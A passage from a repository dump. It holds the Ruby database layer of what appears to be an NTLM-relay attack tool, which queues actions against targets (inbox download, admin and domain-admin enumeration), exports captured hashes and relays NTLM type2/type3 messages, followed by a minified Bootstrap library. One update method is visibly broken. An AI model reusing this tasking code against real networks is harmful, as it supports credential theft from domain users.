AND (aresults.uid = users.uid OR (users.uname='ZACKATTACK' AND users.udomain='ZACKATTACK'))))) 265 | OR ((users.aalltargets =0 AND users.aallusers =0) AND (aresults.responsecode = 1 OR (aresults.tid = tgroupmembers.tid AND (aresults.uid = users.uid OR (users.uname='ZACKATTACK' AND users.udomain='ZACKATTACK'))))) 266 | ) WHERE responsecode IS NULL AND tipaddr IS NOT NULL ORDER BY apriority DESC, atgpriority DESC, tpriority DESC, RANDOM() LIMIT 1", uid) 267 | @db.results_as_hash = false 268 | # @db.execute("UPDATE ") 269 | return res 270 | end 271 | def GetTodoActions(aid) 272 | # ugh, here goes the crazy querypalooza 273 | @db.results_as_hash = true 274 | res= @db.execute("SELECT aitem.* FROM actions LEFT JOIN aitem ON actions.aid = aitem.aid WHERE actions.aid = ?", aid) 275 | @db.results_as_hash = false 276 | # @db.execute("UPDATE ") 277 | return res 278 | end 279 | def GetGroupID(groupname) 280 | @db.execute("SELECT gid FROM groups WHERE groupname = ?",groupname) do |woof| 281 | return woof 282 | end 283 | @db.execute("INSERT INTO groups ('groupname') VALUES (?);" ,groupname) 284 | return @db.last_insert_row_id 285 | end 286 | def AddUserToGroup(uid,gid) 287 | @db.execute("SELECT gid from groupmembers WHERE gid = ? AND uid = ?",gid, uid) do |woof| 288 | return false 289 | end 290 | return @db.execute("INSERT INTO groupmembers ('gid','uid') VALUES (?,?);" ,gid, uid) 291 | end 292 | def DelUserFromGroup(uid,gid) 293 | @db.execute("DELETE from groupmembers WHERE gid = ? AND uid = ?",gid, uid) 294 | end 295 | def NewActionItem(aid,amoduleid,aitemact,aitemdetail,aipriority=50) 296 | @db.execute("INSERT INTO aitem ('aid','moduleid','aitemact','aitemdetail','aipriority') VALUES (?,?,?,?,?)",aid,amoduleid,aitemact,aitemdetail,aipriority) 297 | return @db.last_insert_row_id 298 | end 299 | def NewAction(aname,anotes,amoduleid,aalltargets=1,aallusers=1, priority=50) 300 | @db.execute("INSERT INTO actions ('aname','anotes','moduleid','aalltargets','aallusers') VALUES(?,?,?,?,?)",aname,anotes,amoduleid,aalltargets,aallusers) 301 | last = @db.last_insert_row_id 302 | if amoduleid == "1" then 303 | details = {"folder" => "inbox"} #autoadd download inbox items 304 | NewActionItem(last,amoduleid,1,details.inspect) 305 | elsif amoduleid == "2" then 306 | details = {"group" => "Administrators"} #autoadd enum Admins 307 | NewActionItem(last,amoduleid,1,details.inspect) 308 | elsif amoduleid == "3" then 309 | details = {"group" => "Domain Administrators"} #autoadd enum DAs 310 | NewActionItem(last,amoduleid,1,details.inspect) 311 | end 312 | return last 313 | end 314 | def GetActionItems(aid) 315 | return @db.execute("SELECT aitem.*,aitemact.aitemdesc FROM aitem LEFT JOIN actions ON actions.aid = aitem.aid LEFT JOIN aitemact ON aitem.aitemact = aitemact.aitemactid AND aitemact.moduleid = actions.moduleid WHERE aitem.aid = ? ",aid) 316 | end 317 | def AddGroupToAction(gid,aid) 318 | @db.execute("SELECT gid from agroup WHERE gid = ? AND aid = ?",gid, aid) do |woof| 319 | return false 320 | end 321 | return @db.execute("INSERT INTO agroup ('gid','aid') VALUES (?,?);" ,gid, aid) 322 | end 323 | def DeleteAction(aid) 324 | @db.execute("DELETE FROM actions WHERE aid = ?;",aid) 325 | @db.execute("DELETE FROM agroup WHERE aid = ?;",aid) 326 | @db.execute("DELETE FROM atgroup WHERE aid = ?;",aid) 327 | end 328 | def DeleteActionItem(aiid) 329 | @db.execute("DELETE FROM aitem WHERE aitemid = ?",aiid) 330 | end 331 | def GetTargetId(tipaddr,tname) 332 | @db.execute("SELECT tid FROM targets WHERE tipaddr = ?",tipaddr) do |woof| 333 | return woof 334 | end 335 | @db.execute("INSERT INTO targets ('tipaddr','tname') VALUES (?,?);" ,tipaddr,tname) 336 | return @db.last_insert_row_id 337 | end 338 | def GetTgroupID(tgname) 339 | @db.execute("SELECT tgid FROM tgroups WHERE tgname = ?",tgname) do |woof| 340 | return woof 341 | end 342 | @db.execute("INSERT INTO tgroups ('tgname') VALUES (?);" ,tgname) 343 | return @db.last_insert_row_id 344 | end 345 | def AddTargetToTgroup(tid,tgid) 346 | @db.execute("SELECT tgid from tgroupmembers WHERE tgid = ? AND tid = ?",tgid, tid) do |woof| 347 | return false 348 | end 349 | return @db.execute("INSERT INTO tgroupmembers ('tgid','tid') VALUES (?,?);" ,tgid, tid) 350 | end 351 | def AddTgroupToAction(tgid,aid) 352 | @db.execute("SELECT tgid from atgroup WHERE tgid = ? AND aid = ?",tgid, aid) do |woof| 353 | return false 354 | end 355 | return @db.execute("INSERT INTO atgroup ('tgid','aid') VALUES (?,?);" ,tgid, aid) 356 | end 357 | def ActionPerformed(aid,tid,uid,responsecode=2,response="SETUP REQUESTED") 358 | @db.execute("INSERT INTO aresults ('aid','tid','uid','responsecode','response') VALUES (?,?,?,?,?)",aid,tid,uid,responsecode,response) 359 | return @db.last_insert_row_id 360 | end 361 | def ModifyActionResonse(arid,resonsecode,response) 362 | @db.execute("UPDATE arresults SET 'responsecode' = ?, 'response' = ? WHERE aresid = ?",responsecode,repsonse,arid) 363 | end 364 | def GetGroups(uid=nil) 365 | if uid==nil then return @db.execute("SELECT * FROM groups") 366 | else return @db.execute("SELECT groups.* FROM groups LEFT JOIN groupmembers ON groups.gid = groupmembers.gid LEFT JOIN users ON groupmembers.uid = users.uid WHERE users.uid = ?",uid) 367 | end 368 | end 369 | def GetGroupMembers(gid) 370 | return @db.execute("SELECT users.* FROM groups LEFT JOIN groupmembers ON groups.gid = groupmembers.gid LEFT JOIN users ON users.uid = groupmembers.uid WHERE groups.gid = ?",gid) 371 | end 372 | def DeleteGroup 373 | #not supported yet - deleting would break shit 374 | end 375 | def GetUsers 376 | return @db.execute("SELECT users.*,authsessions.timestamp,authsessions.ipaddr,authsessions.method,authsessions.reqpath FROM users LEFT JOIN authsessions ON users.uid=authsessions.userid AND authsessions.timestamp = (SELECT MAX(timestamp) FROM authsessions WHERE authsessions.userid = users.uid) ORDER BY timestamp DESC") 377 | end 378 | def GetTargets(tgid=0) 379 | if (tgid==0) then 380 | return @db.execute("SELECT * FROM targets") 381 | else 382 | return @db.execute("SELECT targets.* FROM targets LEFT JOIN tgroupmembers ON tgroupmembers.tid = targets.tid WHERE tgroupmembers.tgid = ?",tgid) 383 | end 384 | end 385 | def GetTGroups 386 | return @db.execute("SELECT * FROM tgroups") 387 | end 388 | def DelTargetFromTgroup(tid,tgid) 389 | return @db.execute("DELETE FROM tgroupmembers WHERE tid = ? AND tgid = ?",tid,tgid) 390 | end 391 | def GetActions() 392 | return @db.execute("SELECT * FROM actions") 393 | end 394 | def GetActionsUGroup(aid) 395 | return @db.execute("SELECT groups.* FROM agroup LEFT JOIN groups ON agroup.gid = groups.gid WHERE agroup.aid = ?",aid) 396 | end 397 | def GetActionsTGroup(aid) 398 | return @db.execute("SELECT tgroups.* FROM atgroup LEFT JOIN tgroups on atgroup.tgid = tgroups.tgid WHERE atgroup.aid = ?",aid) 399 | end 400 | def ExportHashes() 401 | res = @db.execute("SELECT * FROM hashes LEFT JOIN users ON hashes.uid = users.uid GROUP BY hashes.uid") 402 | return res 403 | end 404 | def GetMods() 405 | res = @db.execute("SELECT * FROM modules") 406 | end 407 | def GetApiReq(uid) 408 | res = @db.execute("SELECT * FROM apireq WHERE uid = ? AND status=0 LIMIT 1",uid) 409 | if res[0]==nil then return nil 410 | else 411 | 412 | return {"moduleid" =>0, "aid"=>0, "tipaddr" => res[0][0].to_s } 413 | end 414 | #return reqid 415 | end 416 | def AddApiReq(uname,udomain,type2) 417 | uid = Getuserid(uname,udomain) 418 | @db.execute("INSERT INTO apireq (uid,type2) VALUES (?,?)", uid,type2) 419 | return @db.last_insert_row_id 420 | end 421 | def ProcessApiReq(reqid) 422 | @db.execute("UPDATE apireq SET status = 2 WHERE reqid = ?", reqid) 423 | return @db.execute("SELECT * FROM apireq WHERE reqid = ? LIMIT 1",reqid)[0] 424 | #return type2 425 | end 426 | def SetApiResp(reqid, type3resp) 427 | @db.execute("UPDATE apireq SET status = 1 , type3 = ? WHERE reqid = ?",type3resp,reqid) 428 | #set type3 429 | end 430 | def WaitForApiResp(reqid,timeout) 431 | begin 432 | Timeout.timeout(timeout) { 433 | resp = nil 434 | while resp==nil do 435 | resp = @db.execute("SELECT type3 FROM apireq WHERE reqid = ? AND status = 1",reqid)[0] 436 | sleep 0.1 437 | end 438 | return resp 439 | } 440 | rescue Timeout::Error 441 | puts "No API Response In Timeout Window" 442 | return nil 443 | rescue 444 | puts $! 445 | end 446 | end 447 | end 448 | end 449 | -------------------------------------------------------------------------------- /bootstrap/js/bootstrap.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap.js by @fat & @mdo 3 | * Copyright 2012 Twitter, Inc. 4 | * http://www.apache.org/licenses/LICENSE-2.0.txt 5 | */ 6 | !function(a){a(function(){"use strict",a.support.transition=function(){var a=function(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd",msTransition:"MSTransitionEnd",transition:"transitionend"},c;for(c in b)if(a.style[c]!==undefined)return b[c]}();return a&&{end:a}}()})}(window.jQuery),!function(a){"use strict";var b='[data-dismiss="alert"]',c=function(c){a(c).on("click",b,this.close)};c.prototype.close=function(b){function f(){e.trigger("closed").remove()}var c=a(this),d=c.attr("data-target"),e;d||(d=c.attr("href"),d=d&&d.replace(/.*(?=#[^\s]*$)/,"")),e=a(d),b&&b.preventDefault(),e.length||(e=c.hasClass("alert")?c:c.parent()),e.trigger(b=a.Event("close"));if(b.isDefaultPrevented())return;e.removeClass("in"),a.support.transition&&e.hasClass("fade")?e.on(a.support.transition.end,f):f()},a.fn.alert=function(b){return this.each(function(){var d=a(this),e=d.data("alert");e||d.data("alert",e=new c(this)),typeof b=="string"&&e[b].call(d)})},a.fn.alert.Constructor=c,a(function(){a("body").on("click.alert.data-api",b,c.prototype.close)})}(window.jQuery),!function(a){"use strict";var b=function(b,c){this.$element=a(b),this.options=a.extend({},a.fn.button.defaults,c)};b.prototype.setState=function(a){var b="disabled",c=this.$element,d=c.data(),e=c.is("input")?"val":"html";a+="Text",d.resetText||c.data("resetText",c[e]()),c[e](d[a]||this.options[a]),setTimeout(function(){a=="loadingText"?c.addClass(b).attr(b,b):c.removeClass(b).removeAttr(b)},0)},b.prototype.toggle=function(){var a=this.$element.parent('[data-toggle="buttons-radio"]');a&&a.find(".active").removeClass("active"),this.$element.toggleClass("active")},a.fn.button=function(c){return this.each(function(){var d=a(this),e=d.data("button"),f=typeof c=="object"&&c;e||d.data("button",e=new b(this,f)),c=="toggle"?e.toggle():c&&e.setState(c)})},a.fn.button.defaults={loadingText:"loading..."},a.fn.button.Constructor=b,a(function(){a("body").on("click.button.data-api","[data-toggle^=button]",function(b){var c=a(b.target);c.hasClass("btn")||(c=c.closest(".btn")),c.button("toggle")})})}(window.jQuery),!function(a){"use strict";var b=function(b,c){this.$element=a(b),this.options=c,this.options.slide&&this.slide(this.options.slide),this.options.pause=="hover"&&this.$element.on("mouseenter",a.proxy(this.pause,this)).on("mouseleave",a.proxy(this.cycle,this))};b.prototype={cycle:function(b){return b||(this.paused=!1),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},to:function(b){var c=this.$element.find(".active"),d=c.parent().children(),e=d.index(c),f=this;if(b>d.length-1||b<0)return;return this.sliding?this.$element.one("slid",function(){f.to(b)}):e==b?this.pause().cycle():this.slide(b>e?"next":"prev",a(d[b]))},pause:function(a){return a||(this.paused=!0),clearInterval(this.interval),this.interval=null,this},next:function(){if(this.sliding)return;return this.slide("next")},prev:function(){if(this.sliding)return;return this.slide("prev")},slide:function(b,c){var d=this.$element.find(".active"),e=c||d[b](),f=this.interval,g=b=="next"?"left":"right",h=b=="next"?"first":"last",i=this,j=a.Event("slide");this.sliding=!0,f&&this.pause(),e=e.length?e:this.$element.find(".item")[h]();if(e.hasClass("active"))return;if(a.support.transition&&this.$element.hasClass("slide")){this.$element.trigger(j);if(j.isDefaultPrevented())return;e.addClass(b),e[0].offsetWidth,d.addClass(g),e.addClass(g),this.$element.one(a.support.transition.end,function(){e.removeClass([b,g].join(" ")).addClass("active"),d.removeClass(["active",g].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger("slid")},0)})}else{this.$element.trigger(j);if(j.isDefaultPrevented())return;d.removeClass("active"),e.addClass("active"),this.sliding=!1,this.$element.trigger("slid")}return f&&this.cycle(),this}},a.fn.carousel=function(c){return this.each(function(){var d=a(this),e=d.data("carousel"),f=a.extend({},a.fn.carousel.defaults,typeof c=="object"&&c);e||d.data("carousel",e=new b(this,f)),typeof c=="number"?e.to(c):typeof c=="string"||(c=f.slide)?e[c]():f.interval&&e.cycle()})},a.fn.carousel.defaults={interval:5e3,pause:"hover"},a.fn.carousel.Constructor=b,a(function(){a("body").on("click.carousel.data-api","[data-slide]",function(b){var c=a(this),d,e=a(c.attr("data-target")||(d=c.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,"")),f=!e.data("modal")&&a.extend({},e.data(),c.data());e.carousel(f),b.preventDefault()})})}(window.jQuery),!function(a){"use strict";var b=function(b,c){this.$element=a(b),this.options=a.extend({},a.fn.collapse.defaults,c),this.options.parent&&(this.$parent=a(this.options.parent)),this.options.toggle&&this.toggle()};b.prototype={constructor:b,dimension:function(){var a=this.$element.hasClass("width");return a?"width":"height"},show:function(){var b,c,d,e;if(this.transitioning)return;b=this.dimension(),c=a.camelCase(["scroll",b].join("-")),d=this.$parent&&this.$parent.find("> .accordion-group > .in");if(d&&d.length){e=d.data("collapse");if(e&&e.transitioning)return;d.collapse("hide"),e||d.data("collapse",null)}this.$element[b](0),this.transition("addClass",a.Event("show"),"shown"),this.$element[b](this.$element[0][c])},hide:function(){var b;if(this.transitioning)return;b=this.dimension(),this.reset(this.$element[b]()),this.transition("removeClass",a.Event("hide"),"hidden"),this.$element[b](0)},reset:function(a){var b=this.dimension();return this.$element.removeClass("collapse")[b](a||"auto")[0].offsetWidth,this.$element[a!==null?"addClass":"removeClass"]("collapse"),this},transition:function(b,c,d){var e=this,f=function(){c.type=="show"&&e.reset(),e.transitioning=0,e.$element.trigger(d)};this.$element.trigger(c);if(c.isDefaultPrevented())return;this.transitioning=1,this.$element[b]("in"),a.support.transition&&this.$element.hasClass("collapse")?this.$element.one(a.support.transition.end,f):f()},toggle:function(){this[this.$element.hasClass("in")?"hide":"show"]()}},a.fn.collapse=function(c){return this.each(function(){var d=a(this),e=d.data("collapse"),f=typeof c=="object"&&c;e||d.data("collapse",e=new b(this,f)),typeof c=="string"&&e[c]()})},a.fn.collapse.defaults={toggle:!0},a.fn.collapse.Constructor=b,a(function(){a("body").on("click.collapse.data-api","[data-toggle=collapse]",function(b){var c=a(this),d,e=c.attr("data-target")||b.preventDefault()||(d=c.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""),f=a(e).data("collapse")?"toggle":c.data();a(e).collapse(f)})})}(window.jQuery),!function(a){function d(){a(b).parent().removeClass("open")}"use strict";var b='[data-toggle="dropdown"]',c=function(b){var c=a(b).on("click.dropdown.data-api",this.toggle);a("html").on("click.dropdown.data-api",function(){c.parent().removeClass("open")})};c.prototype={constructor:c,toggle:function(b){var c=a(this),e,f,g;if(c.is(".disabled, :disabled"))return;return f=c.attr("data-target"),f||(f=c.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,"")),e=a(f),e.length||(e=c.parent()),g=e.hasClass("open"),d(),g||e.toggleClass("open"),!1}},a.fn.dropdown=function(b){return this.each(function(){var d=a(this),e=d.data("dropdown");e||d.data("dropdown",e=new c(this)),typeof b=="string"&&e[b].call(d)})},a.fn.dropdown.Constructor=c,a(function(){a("html").on("click.dropdown.data-api",d),a("body").on("click.dropdown",".dropdown form",function(a){a.stopPropagation()}).on("click.dropdown.data-api",b,c.prototype.toggle)})}(window.jQuery),!function(a){function c(){var b=this,c=setTimeout(function(){b.$element.off(a.support.transition.end),d.call(b)},500);this.$element.one(a.support.transition.end,function(){clearTimeout(c),d.call(b)})}function d(a){this.$element.hide().trigger("hidden"),e.call(this)}function e(b){var c=this,d=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var e=a.support.transition&&d;this.$backdrop=a('
    ').appendTo(document.body),this.options.backdrop!="static"&&this.$backdrop.click(a.proxy(this.hide,this)),e&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in"),e?this.$backdrop.one(a.support.transition.end,b):b()}else!this.isShown&&this.$backdrop?(this.$backdrop.removeClass("in"),a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one(a.support.transition.end,a.proxy(f,this)):f.call(this)):b&&b()}function f(){this.$backdrop.remove(),this.$backdrop=null}function g(){var b=this;this.isShown&&this.options.keyboard?a(document).on("keyup.dismiss.modal",function(a){a.which==27&&b.hide()}):this.isShown||a(document).off("keyup.dismiss.modal")}"use strict";var b=function(b,c){this.options=c,this.$element=a(b).delegate('[data-dismiss="modal"]',"click.dismiss.modal",a.proxy(this.hide,this))};b.prototype={constructor:b,toggle:function(){return this[this.isShown?"hide":"show"]()},show:function(){var b=this,c=a.Event("show");this.$element.trigger(c);if(this.isShown||c.isDefaultPrevented())return;a("body").addClass("modal-open"),this.isShown=!0,g.call(this),e.call(this,function(){var c=a.support.transition&&b.$element.hasClass("fade");b.$element.parent().length||b.$element.appendTo(document.body),b.$element.show(),c&&b.$element[0].offsetWidth,b.$element.addClass("in"),c?b.$element.one(a.support.transition.end,function(){b.$element.trigger("shown")}):b.$element.trigger("shown")})},hide:function(b){b&&b.preventDefault();var e=this;b=a.Event("hide"),this.$element.trigger(b);if(!this.isShown||b.isDefaultPrevented())return;this.isShown=!1,a("body").removeClass("modal-open"),g.call(this),this.$element.removeClass("in"),a.support.transition&&this.$element.hasClass("fade")?c.call(this):d.call(this)}},a.fn.modal=function(c){return this.each(function(){var d=a(this),e=d.data("modal"),f=a.extend({},a.fn.modal.defaults,d.data(),typeof c=="object"&&c);e||d.data("modal",e=new b(this,f)),typeof c=="string"?e[c]():f.show&&e.show()})},a.fn.modal.defaults={backdrop:!0,keyboard:!0,show:!0},a.fn.modal.Constructor=b,a(function(){a("body").on("click.modal.data-api",'[data-toggle="modal"]',function(b){var c=a(this),d,e=a(c.attr("data-target")||(d=c.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,"")),f=e.data("modal")?"toggle":a.extend({},e.data(),c.data());b.preventDefault(),e.modal(f)})})}(window.jQuery),!function(a){"use strict";var b=function(a,b){this.init("tooltip",a,b)};b.prototype={constructor:b,init:function(b,c,d){var e,f;this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.enabled=!0,this.options.trigger!="manual"&&(e=this.options.trigger=="hover"?"mouseenter":"focus",f=this.options.trigger=="hover"?"mouseleave":"blur",this.$element.on(e,this.options.selector,a.proxy(this.enter,this)),this.$element.on(f,this.options.selector,a.proxy(this.leave,this))),this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},getOptions:function(b){return b=a.extend({},a.fn[this.type].defaults,b,this.$element.data()),b.delay&&typeof b.delay=="number"&&(b.delay={show:b.delay,hide:b.delay}),b},enter:function(b){var c=a(b.currentTarget)[this.type](this._options).data(this.type);if(!c.options.delay||!c.options.delay.show)return c.show();clearTimeout(this.timeout),c.hoverState="in",this.timeout=setTimeout(function(){c.hoverState=="in"&&c.show()},c.options.delay.show)},leave:function(b){var c=a(b.currentTarget)[this.type](this._options).data(this.type);this.timeout&&clearTimeout(this.timeout);if(!c.options.delay||!c.options.delay.hide)return c.hide();c.hoverState="out",this.timeout=setTimeout(function(){c.hoverState=="out"&&c.hide()},c.options.delay.hide)},show:function(){var a,b,c,d,e,f,g;if(this.hasContent()&&this.enabled){a=this.tip(),this.setContent(),this.options.animation&&a.addClass("fade"),f=typeof this.options.placement=="function"?this.options.placement.call(this,a[0],this.$element[0]):this.options.placement,b=/in/.test(f),a.remove().css({top:0,left:0,display:"block"}).appendTo(b?this.$element:document.body),c=this.getPosition(b),d=a[0].offsetWidth,e=a[0].offsetHeight;switch(b?f.split(" ")[1]:f){case"bottom":g={top:c.top+c.height,left:c.left+c.width/2-d/2};break;case"top":g={top:c.top-e,left:c.left+c.width/2-d/2};break;case"left":g={top:c.top+c.height/2-e/2,left:c.left-d};break;case"right":g={top:c.top+c.height/2-e/2,left:c.left+c.width}}a.css(g).addClass(f).addClass("in")}},isHTML:function(a){return typeof a!="string"||a.charAt(0)==="<"&&a.charAt(a.length-1)===">"&&a.length>=3||/^(?:[^<]*<[\w\W]+>[^>]*$)/.exec(a)},setContent:function(){var a=this.tip(),b=this.getTitle();a.find(".tooltip-inner")[this.isHTML(b)?"html":"text"](b),a.removeClass("fade in top bottom left right")},hide:function(){function d(){var b=setTimeout(function(){c.off(a.support.transition.end).remove()},500);c.one(a.support.transition.end,function(){clearTimeout(b),c.remove()})}var b=this,c=this.tip();c.removeClass("in"),a.support.transition&&this.$tip.hasClass("fade")?d():c.remove()},fixTitle:function(){var a=this.$element;(a.attr("title")||typeof a.attr("data-original-title")!="string")&&a.attr("data-original-title",a.attr("title")||"").removeAttr("title")},hasContent:function(){return this.getTitle()},getPosition:function(b){return a.extend({},b?{top:0,left:0}:this.$element.offset(),{width:this.$element[0].offsetWidth,height:this.$element[0].offsetHeight})},getTitle:function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||(typeof c.title=="function"?c.title.call(b[0]):c.title),a},tip:function(){return this.$tip=this.$tip||a(this.options.template)},validate:function(){this.$element[0].parentNode||(this.hide(),this.$element=null,this.options=null)},enable:function(){this.enabled=!0},disable:function(){this.enabled=!1},toggleEnabled:function(){this.enabled=!this.enabled},toggle:function(){this[this.tip().hasClass("in")?"hide":"show"]()}},a.fn.tooltip=function(c){return this.each(function(){var d=a(this),e=d.data("tooltip"),f=typeof c=="object"&&c;e||d.data("tooltip",e=new b(this,f)),typeof c=="string"&&e[c]()})},a.fn.tooltip.Constructor=b,a.fn.tooltip.defaults={animation:!0,placement:"top",selector:!1,template:'
    ',trigger:"hover",title:"",delay:0}}(window.jQuery),!function(a){"use strict";var b=function(a,b){this.init("popover",a,b)};b.prototype=a.extend({},a.fn.tooltip.Constructor.prototype,{constructor:b,setContent:function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.isHTML(b)?"html":"text"](b),a.find(".popover-content > *")[this.isHTML(c)?"html":"text"](c),a.removeClass("fade top bottom left right in")},hasContent:function(){return this.getTitle()||this.getContent()},getContent:function(){var a,b=this.$element,c=this.options;return a=b.attr("data-content")||(typeof c.content=="function"?c.content.call(b[0]):c.content),a},tip:function(){return this.$tip||(this.$tip=a(this.options.template)),this.$tip}}),a.fn.popover=function(c){return this.each(function(){var d=a(this),e=d.data("popover"),f=typeof c=="object"&&c;e||d.data("popover",e=new b(this,f)),typeof c=="string"&&e[c]()})},a.fn.popover.Constructor=b,a.fn.popover.defaults=a.extend({},a.fn.tooltip.defaults,{placement:"right",content:"",template:'

    '})}(window.jQuery),!function(a){function b(b,c){var d=a.proxy(this.process,this),e=a(b).is("body")?a(window):a(b),f;this.options=a.extend({},a.fn.scrollspy.defaults,c),this.$scrollElement=e.on("scroll.scroll.data-api",d),this.selector=(this.options.target||(f=a(b).attr("href"))&&f.replace(/.*(?=#[^\s]+$)/,"")||"")+" .nav li > a",this.$body=a("body"),this.refresh(),this.process()}"use strict",b.prototype={constructor:b,refresh:function(){var b=this,c;this.offsets=a([]),this.targets=a([]),c=this.$body.find(this.selector).map(function(){var b=a(this),c=b.data("target")||b.attr("href"),d=/^#\w/.test(c)&&a(c);return d&&c.length&&[[d.position().top,c]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},process:function(){var a=this.$scrollElement.scrollTop()+this.options.offset,b=this.$scrollElement[0].scrollHeight||this.$body[0].scrollHeight,c=b-this.$scrollElement.height(),d=this.offsets,e=this.targets,f=this.activeTarget,g;if(a>=c)return f!=(g=e.last()[0])&&this.activate(g);for(g=d.length;g--;)f!=e[g]&&a>=d[g]&&(!d[g+1]||a<=d[g+1])&&this.activate(e[g])},activate:function(b){var c,d;this.activeTarget=b,a(this.selector).parent(".active").removeClass("active"),d=this.selector+'[data-target="'+b+'"],'+this.selector+'[href="'+b+'"]',c=a(d).parent("li").addClass("active"),c.parent(".dropdown-menu")&&(c=c.closest("li.dropdown").addClass("active")),c.trigger("activate")}},a.fn.scrollspy=function(c){return this.each(function(){var d=a(this),e=d.data("scrollspy"),f=typeof c=="object"&&c;e||d.data("scrollspy",e=new b(this,f)),typeof c=="string"&&e[c]()})},a.fn.scrollspy.Constructor=b,a.fn.scrollspy.defaults={offset:10},a(function(){a('[data-spy="scroll"]').each(function(){var b=a(this);b.scrollspy(b.data())})})}(window.jQuery),!function(a){"use strict";var b=function(b){this.element=a(b)};b.prototype={constructor:b,show:function(){var b=this.element,c=b.closest("ul:not(.dropdown-menu)"),d=b.attr("data-target"),e,f,g;d||(d=b.attr("href"),d=d&&d.replace(/.*(?=#[^\s]*$)/,""));if(b.parent("li").hasClass("active"))return;e=c.find(".active a").last()[0],g=a.Event("show",{relatedTarget:e}),b.trigger(g);if(g.isDefaultPrevented())return;f=a(d),this.activate(b.parent("li"),c),this.activate(f,f.parent(),function(){b.trigger({type:"shown",relatedTarget:e})})},activate:function(b,c,d){function g(){e.removeClass("active").find("> .dropdown-menu > .active").removeClass("active"),b.addClass("active"),f?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu")&&b.closest("li.dropdown").addClass("active"),d&&d()}var e=c.find("> .active"),f=d&&a.support.transition&&e.hasClass("fade");f?e.one(a.support.transition.end,g):g(),e.removeClass("in")}},a.fn.tab=function(c){return this.each(function(){var d=a(this),e=d.data("tab");e||d.data("tab",e=new b(this)),typeof c=="string"&&e[c]()})},a.fn.tab.Constructor=b,a(function(){a("body").on("click.tab.data-api",'[data-toggle="tab"], [data-toggle="pill"]',function(b){b.preventDefault(),a(this).tab("show")})})}(window.jQuery),!function(a){"use strict";var b=function(b,c){this.$element=a(b),this.options=a.extend({},a.fn.typeahead.defaults,c),this.matcher=this.options.matcher||this.matcher,this.sorter=this.options.sorter||this.sorter,this.highlighter=this.options.highlighter||this.highlighter,this.updater=this.options.updater||this.updater,this.$menu=a(this.options.menu).appendTo("body"),this.source=this.options.source,this.shown=!1,this.listen()};b.prototype={constructor:b,select:function(){var a=this.$menu.find(".active").attr("data-value");return this.$element.val(this.updater(a)).change(),this.hide()},updater:function(a){return a},show:function(){var b=a.extend({},this.$element.offset(),{height:this.$element[0].offsetHeight});return this.$menu.css({top:b.top+b.height,left:b.left}),this.$menu.show(),this.shown=!0,this},hide:function(){return this.$menu.hide(),this.shown=!1,this},lookup:function(b){var c=this,d,e;return this.query=this.$element.val(),this.query?(d=a.grep(this.source,function(a){return c.matcher(a)}),d=this.sorter(d),d.length?this.render(d.slice(0,this.options.items)).show():this.shown?this.hide():this):this.shown?this.hide():this},matcher:function(a){return~a.toLowerCase().indexOf(this.query.toLowerCase())},sorter:function(a){var b=[],c=[],d=[],e;while(e=a.shift())e.toLowerCase().indexOf(this.query.toLowerCase())?~e.indexOf(this.query)?c.push(e):d.push(e):b.push(e);return b.concat(c,d)},highlighter:function(a){var b=this.query.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g,"\\$&");return a.replace(new RegExp("("+b+")","ig"),function(a,b){return""+b+""})},render:function(b){var c=this;return b=a(b).map(function(b,d){return b=a(c.options.item).attr("data-value",d),b.find("a").html(c.highlighter(d)),b[0]}),b.first().addClass("active"),this.$menu.html(b),this},next:function(b){var c=this.$menu.find(".active").removeClass("active"),d=c.next();d.length||(d=a(this.$menu.find("li")[0])),d.addClass("active")},prev:function(a){var b=this.$menu.find(".active").removeClass("active"),c=b.prev();c.length||(c=this.$menu.find("li").last()),c.addClass("active")},listen:function(){this.$element.on("blur",a.proxy(this.blur,this)).on("keypress",a.proxy(this.keypress,this)).on("keyup",a.proxy(this.keyup,this)),(a.browser.webkit||a.browser.msie)&&this.$element.on("keydown",a.proxy(this.keypress,this)),this.$menu.on("click",a.proxy(this.click,this)).on("mouseenter","li",a.proxy(this.mouseenter,this))},keyup:function(a){switch(a.keyCode){case 40:case 38:break;case 9:case 13:if(!this.shown)return;this.select();break;case 27:if(!this.shown)return;this.hide();break;default:this.lookup()}a.stopPropagation(),a.preventDefault()},keypress:function(a){if(!this.shown)return;switch(a.keyCode){case 9:case 13:case 27:a.preventDefault();break;case 38:if(a.type!="keydown")break;a.preventDefault(),this.prev();break;case 40:if(a.type!="keydown")break;a.preventDefault(),this.next()}a.stopPropagation()},blur:function(a){var b=this;setTimeout(function(){b.hide()},150)},click:function(a){a.stopPropagation(),a.preventDefault(),this.select()},mouseenter:function(b){this.$menu.find(".active").removeClass("active"),a(b.currentTarget).addClass("active")}},a.fn.typeahead=function(c){return this.each(function(){var d=a(this),e=d.data("typeahead"),f=typeof c=="object"&&c;e||d.data("typeahead",e=new b(this,f)),typeof c=="string"&&e[c]()})},a.fn.typeahead.defaults={source:[],items:8,menu:'
      ',item:'
      • '},a.fn.typeahead.Constructor=b,a(function(){a("body").on("focus.typeahead.data-api",'[data-provide="typeahead"]',function(b){var c=a(this);if(c.data("typeahead"))return;b.preventDefault(),c.typeahead(c.data())})})}(window.jQuery); --------------------------------------------------------------------------------